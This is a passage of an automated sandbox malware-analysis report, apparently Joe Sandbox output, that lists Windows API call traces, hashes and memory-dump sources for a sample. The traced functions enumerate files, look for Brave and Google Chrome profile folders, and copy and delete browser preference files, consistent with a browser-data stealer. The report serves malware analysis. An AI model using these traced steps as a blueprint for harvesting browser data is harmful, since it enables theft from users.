                                  • Instruction ID: 02427d2bcba05196493b36b58eb0ee89569406c617fff37af4138a18b59b399f
                                  • Opcode Fuzzy Hash: efd8ada7aa876cedbdd5412fe24b2625d0583487009dc63d568cd7394e12366d
                                  • Instruction Fuzzy Hash: 9AA2913190126ADFCB22EF75DC89AAF77B9AF04700F099129F909E7291DB74DD418B60
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E16E2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E176C
                                  • lstrcat.KERNEL32(00000000), ref: 003E1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E17A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E17EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E17F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1875
                                  • lstrcat.KERNEL32(00000000), ref: 003E187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E18AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E18FE
                                  • lstrlen.KERNEL32(00411794), ref: 003E1909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1929
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1966
                                  • lstrlen.KERNEL32(\*.*), ref: 003E1971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003E199A
                                    • Part of subcall function 00404040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0040406D
                                    • Part of subcall function 00404040: lstrcpy.KERNEL32(00000000,?), ref: 004040A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E19C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1A16
                                  • lstrlen.KERNEL32(00411794), ref: 003E1A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1A41
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1A81
                                  • lstrlen.KERNEL32(00411794), ref: 003E1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1AAC
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003E1B45
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003E1B70
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003E1B8A
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1C03
                                  • lstrlen.KERNEL32(00411794), ref: 003E1C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1C31
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1C74
                                  • lstrlen.KERNEL32(00411794), ref: 003E1C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1CA2
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1CAE
                                  • lstrlen.KERNEL32(?), ref: 003E1CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1CE9
                                  • lstrlen.KERNEL32(00411794), ref: 003E1CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1D14
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1DEB
                                  • lstrlen.KERNEL32(00411794), ref: 003E1DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1E19
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1E56
                                  • lstrlen.KERNEL32(00411794), ref: 003E1E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1E81
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1E8D
                                  • lstrlen.KERNEL32(?), ref: 003E1E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003E1F45
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1F9F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003E1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1FE3
                                  • lstrlen.KERNEL32(00411794), ref: 003E1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E200E
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E204D
                                  • lstrlen.KERNEL32(00411794), ref: 003E2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2075
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E2081
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: e8675cef09d39f936652d9ae802345c2f4636dfd41a66dbdd73aefaf9aa12310
                                  • Instruction ID: ffa65a3e8d126131ac5751efb6d30b16698da3bdd8cd494e35870cea405b718e
                                  • Opcode Fuzzy Hash: e8675cef09d39f936652d9ae802345c2f4636dfd41a66dbdd73aefaf9aa12310
                                  • Instruction Fuzzy Hash: 1792A53190126A9FCB22EF66DC89AEF77BDAF44700F095225F805A7291DB74DD41CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDBEF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003EDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC17
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003EDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC4C
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDC8F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003EDCD0
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003EDCF0
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003EDD0A
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003EDD1D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDD7B
                                  • lstrlen.KERNEL32(00411794), ref: 003EDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDA3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDDAF
                                  • lstrlen.KERNEL32(?), ref: 003EDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDE19
                                  • lstrlen.KERNEL32(00411794), ref: 003EDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDE6F
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDE7B
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDEBB
                                  • lstrlen.KERNEL32(00411794), ref: 003EDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDEE6
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDEF2
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFA5
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDFB1
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDFF4
                                  • lstrlen.KERNEL32(00411794), ref: 003EDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE022
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EE02E
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 003EE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 003EE0E7
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE11F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003EE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE19F
                                  • lstrcat.KERNEL32(00000000), ref: 003EE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003EE1F9
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE22F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003EE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE261
                                  • lstrcat.KERNEL32(00000000,011A8A18), ref: 003EE269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 003EE274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 003EE2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE349
                                  • DeleteFileA.KERNEL32(?), ref: 003EE381
                                  • StrCmpCA.SHLWAPI(?,011AEEE8), ref: 003EE3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE445
                                  • StrCmpCA.SHLWAPI(?,011A89E8), ref: 003EE468
                                  • StrCmpCA.SHLWAPI(?,011A8C18), ref: 003EE47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003EE4E0
                                  • StrCmpCA.SHLWAPI(?,011AEDB0), ref: 003EE58E
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003EE639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 003EE776
                                  • DeleteFileA.KERNEL32(?), ref: 003EE7D2
                                  • StrCmpCA.SHLWAPI(?,011A89F8), ref: 003EE7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE952
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: 38727f7ae3a0b3fd8bb95b10659cc5036f7766c9ebe879bdee0baf9c91078776
                                  • Instruction ID: de326a1a232c7120ad745ca35dc0da0bb53e1972270e55cf3cda18e68c4e3ff5
                                  • Opcode Fuzzy Hash: 38727f7ae3a0b3fd8bb95b10659cc5036f7766c9ebe879bdee0baf9c91078776
                                  • Instruction Fuzzy Hash: DB92C3719002669FCB22EF76DC89AEF77B9AF44300F055629F805A72D1DB34ED458B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F18D2
                                  • lstrlen.KERNEL32(\*.*), ref: 003F18DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F18FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003F190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F1947
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F1967
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F1981
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F19BF
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F19F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1A4C
                                  • lstrlen.KERNEL32(00411794), ref: 003F1A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1A80
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1AB4
                                  • lstrlen.KERNEL32(?), ref: 003F1AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F1AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1B19
                                  • lstrlen.KERNEL32(011A8978), ref: 003F1B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1B8F
                                  • lstrlen.KERNEL32(00411794), ref: 003F1BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1BC3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1C57
                                  • lstrlen.KERNEL32(00411794), ref: 003F1C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1C8B
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1D21
                                  • lstrlen.KERNEL32(00411794), ref: 003F1D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1D55
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1DED
                                  • lstrlen.KERNEL32(00411794), ref: 003F1E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1E36
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1E68
                                  • lstrlen.KERNEL32(011AED20), ref: 003F1E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1EB2
                                  • lstrlen.KERNEL32(00411794), ref: 003F1EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1EE3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1F15
                                  • lstrlen.KERNEL32(011AF3B8), ref: 003F1F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1F5F
                                  • lstrlen.KERNEL32(00411794), ref: 003F1F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1F90
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1FC2
                                  • lstrlen.KERNEL32(0119AAA8), ref: 003F1FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2036
                                  • lstrlen.KERNEL32(00411794), ref: 003F2048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2067
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F2073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2098
                                  • lstrlen.KERNEL32(?), ref: 003F20AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F20D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F20DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2103
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F213F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003F214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F2181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: b1ea7d4c3738082dff1cf96b9f95b2dedddde900b224fc9d3f988efc754d66a8
                                  • Instruction ID: cdf30f4b0b0409179c7f1aaef77382186b43a367b7ab05ce2ea31596929b33fb
                                  • Opcode Fuzzy Hash: b1ea7d4c3738082dff1cf96b9f95b2dedddde900b224fc9d3f988efc754d66a8
                                  • Instruction Fuzzy Hash: A262A03191162AEBCB23EF65DC49ABF77BAAF40700F094225F905A7291DB74DD41CBA0
                                  APIs
                                  • wsprintfA.USER32 ref: 003F392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003F3943
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F396C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F3986
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F39BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F39E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F39F2
                                  • lstrlen.KERNEL32(00411794), ref: 003F39FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3A1A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3A26
                                  • lstrlen.KERNEL32(?), ref: 003F3A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F3A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3A8A
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F3ACE
                                  • lstrlen.KERNEL32(?), ref: 003F3AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B36
                                  • lstrlen.KERNEL32(00411794), ref: 003F3B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B6A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B9E
                                  • lstrlen.KERNEL32(?), ref: 003F3BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F3BE0
                                  • lstrlen.KERNEL32(011A8A18), ref: 003F3C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3C3C
                                  • lstrlen.KERNEL32(011A8978), ref: 003F3C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3CB7
                                  • lstrlen.KERNEL32(00411794), ref: 003F3CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3CE8
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3D79
                                  • lstrlen.KERNEL32(00411794), ref: 003F3D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3DAD
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3E43
                                  • lstrlen.KERNEL32(00411794), ref: 003F3E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3E77
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3F0D
                                  • lstrlen.KERNEL32(00411794), ref: 003F3F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3F41
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3F75
                                  • lstrlen.KERNEL32(?), ref: 003F3F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F3FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3FE0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F401F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003F402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F40CE
                                  • lstrcat.KERNEL32(00000000), ref: 003F40DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003F42D9
                                  • FindClose.KERNEL32(00000000), ref: 003F42E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: 3b895da33a702692135a9b2a70cbfc93d917eddc8de7d966c38ede332b31d7e3
                                  • Instruction ID: 62acf5aa64d910abd77a6ad3bc61fe551cb415f6d2d516d09a6ebff533e8ff9a
